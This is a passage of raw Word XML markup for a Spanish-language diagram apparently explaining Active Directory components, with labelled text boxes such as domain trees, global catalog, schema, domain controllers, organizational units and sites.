                <v:shape id="Graphic 136" o:spid="_x0000_s1040" style="position:absolute;left:30543;width:80353;height:51600;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8035290,516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" path="m197993,3301746r-13462,-13335l175552,3279521r-8928,8890l175437,3279521r-8940,-8967l143891,3248152r-26543,80899l197993,3301746xem769112,2949067r-11049,-6350l32473,4203662,4953,4187825,,4272927r70993,-47129l62598,4220972,43522,4210012,769112,2949067xem871601,1400683l106730,941997r3912,-6515l123063,914781,38100,908304r45720,71882l100164,952944r764960,458534l871601,1400683xem873252,1018286l91033,55181r12129,-9842l115697,35179,38100,,56515,83185,81153,63207r782320,963080l873252,1018286xem873506,2575433r-9017,-8890l166497,3270554r9055,8967l184327,3270554,873506,2575433xem974090,1685798r-1143,-12700l182054,1744713r-2870,-31610l170421,1718525r,39917l169291,1745869r1028,11430l170421,1758442r,-39917l106680,1757934r79375,30988l183286,1758442r-102,-1143l974090,1685798xem976249,2067687r-5588,-11430l172250,2449385r-14008,-28511l106680,2488819r85204,508l180657,2466467r-2769,-5614l976249,2067687xem1264031,3368675r-10287,-7366l38544,5093957,12573,5075733,,5159997r74930,-40513l63779,5111661,48945,5101260,1264031,3368675xem7132955,4134104r-6693,-48768l7121398,4049776r-26251,17945l5864987,2271776r-10414,7112l7084644,4074896r-26238,17933l7132955,4134104xem7171436,1855851r-15583,-17272l7114413,1792605r-11595,29527l6614922,1630807r-4572,11938l7098182,1833968r-11582,29503l7171436,1855851xem7727061,402336r-84836,8509l7659205,437667,6799707,980059r6858,10795l7665987,448386r17005,26848l7709776,430911r17285,-28575xem8034909,391668r-82804,20447l7972730,436295,6841744,1400810r8128,9652l7980972,445947r20663,24207l8019504,427990r15405,-36322xe" fillcolor="#4471c4" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="31"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15754240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01C1115E" wp14:editId="66C3F37A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>3693795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="31750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17500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7BD82C27" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="5" w:right="5"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Dominio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="01C1115E" id="Textbox 137" o:spid="_x0000_s1087" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:307.25pt;margin-top:290.85pt;width:240.2pt;height:25pt;z-index:1575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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7BD82C27" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="5" w:right="5"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Dominio</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4752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06606F3C" wp14:editId="3C980818">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>3363595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="31750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17500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="67FA7E15" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="5" w:right="4"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Árboles de dominio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="06606F3C" id="Textbox 138" o:spid="_x0000_s1088" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:307.25pt;margin-top:264.85pt;width:240.2pt;height:25pt;z-index:1575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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="67FA7E15" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="5" w:right="4"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Árboles de dominio</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5264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F7B5C82" wp14:editId="2A98AE43">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6965188</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2793619</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="55753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557530"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="66D9E2FA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="5"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Almacén de datos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2F7B5C82" id="Textbox 139" o:spid="_x0000_s1089" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:548.45pt;margin-top:219.95pt;width:240.2pt;height:43.9pt;z-index:1575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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="66D9E2FA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="5"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Almacén de datos</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5776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E61FB4F" wp14:editId="4FF2DDAA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2793619</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="55753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557530"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3113F1BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="5" w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Particiones</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3E61FB4F" id="Textbox 140" o:spid="_x0000_s1090" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:307.25pt;margin-top:219.95pt;width:240.2pt;height:43.9pt;z-index:157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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3113F1BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="5" w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Particiones</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6288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="332EA60A" wp14:editId="1FA49AF6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6965188</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2463545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="31750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17500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="16770A5C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="1434"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Catálogo Global</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="332EA60A" id="Textbox 141" o:spid="_x0000_s1091" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:548.45pt;margin-top:194pt;width:240.2pt;height:25pt;z-index:1575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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="16770A5C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="1434"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Catálogo Global</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6800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08D9943B" wp14:editId="1E184C24">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2463545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="31750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17500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="60DAEF06" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="5" w:right="5"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Esquema</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="08D9943B" id="Textbox 142" o:spid="_x0000_s1092" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:307.25pt;margin-top:194pt;width:240.2pt;height:25pt;z-index:157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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="60DAEF06" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="5" w:right="5"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Esquema</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7312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="252DB71A" wp14:editId="65D638DC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6965188</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2133345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="31750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17500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7A496873" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="289"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Controlador de dominio de solo lectura (RODC)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="252DB71A" id="Textbox 143" o:spid="_x0000_s1093" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:548.45pt;margin-top:168pt;width:240.2pt;height:25pt;z-index:15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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7A496873" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="289"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Controlador de dominio de solo lectura (RODC)</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7824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="665036A6" wp14:editId="2E4D5945">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2133345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="31750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17500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3D71DBEB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="912"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Unidades organizativas (OU)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="665036A6" id="Textbox 144" o:spid="_x0000_s1094" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:307.25pt;margin-top:168pt;width:240.2pt;height:25pt;z-index:15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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3D71DBEB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="912"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Unidades organizativas (OU)</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8336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6866732C" wp14:editId="3D5D4749">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6965188</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1815845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="30480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04800"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4CE36ECB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="37"/>
                              <w:ind w:left="1302"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Controladores de dominio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6866732C" id="Textbox 145" o:spid="_x0000_s1095" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:548.45pt;margin-top:143pt;width:240.2pt;height:24pt;z-index:1575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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4CE36ECB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="37"/>
                        <w:ind w:left="1302"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Controladores de dominio</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8848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E848F5D" wp14:editId="7E7CC670">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1815845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="3048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04800"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3FAFB1DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="37"/>
                              <w:ind w:left="5" w:right="5"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Sitios</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3E848F5D" id="Textbox 146" o:spid="_x0000_s1096" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:307.25pt;margin-top:143pt;width:240.2pt;height:24pt;z-index:15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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3FAFB1DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="37"/>
                        <w:ind w:left="5" w:right="5"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Sitios</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9360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13D5A6DC" wp14:editId="066EF641">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6965188</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1437386</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="34036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40360"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="036A2422" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="55"/>
                              <w:ind w:left="820"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Componentes físicos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="13D5A6DC" id="Textbox 147" o:spid="_x0000_s1097" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:548.45pt;margin-top:113.2pt;width:240.2pt;height:26.8pt;z-index:157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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="036A2422" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="55"/>
                        <w:ind w:left="820"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Componentes físicos</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59872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69E9D528" wp14:editId="4AA34C8D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>83819</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>3279647</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3055620" cy="46228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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7BD21822" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="62" w:line="237" w:lineRule="auto"/>
                              <w:ind w:left="1770" w:hanging="1316"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Ej: Directorio de aplicaciones, directorio de configuración, etc.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="69E9D528" id="Textbox 148" o:spid="_x0000_s1098" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:6.6pt;margin-top:258.25pt;width:240.6pt;height:36.4pt;z-index:157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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7BD21822" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="62" w:line="237" w:lineRule="auto"/>
                        <w:ind w:left="1770" w:hanging="1316"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Ej: Directorio de aplicaciones, directorio de configuración, etc.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
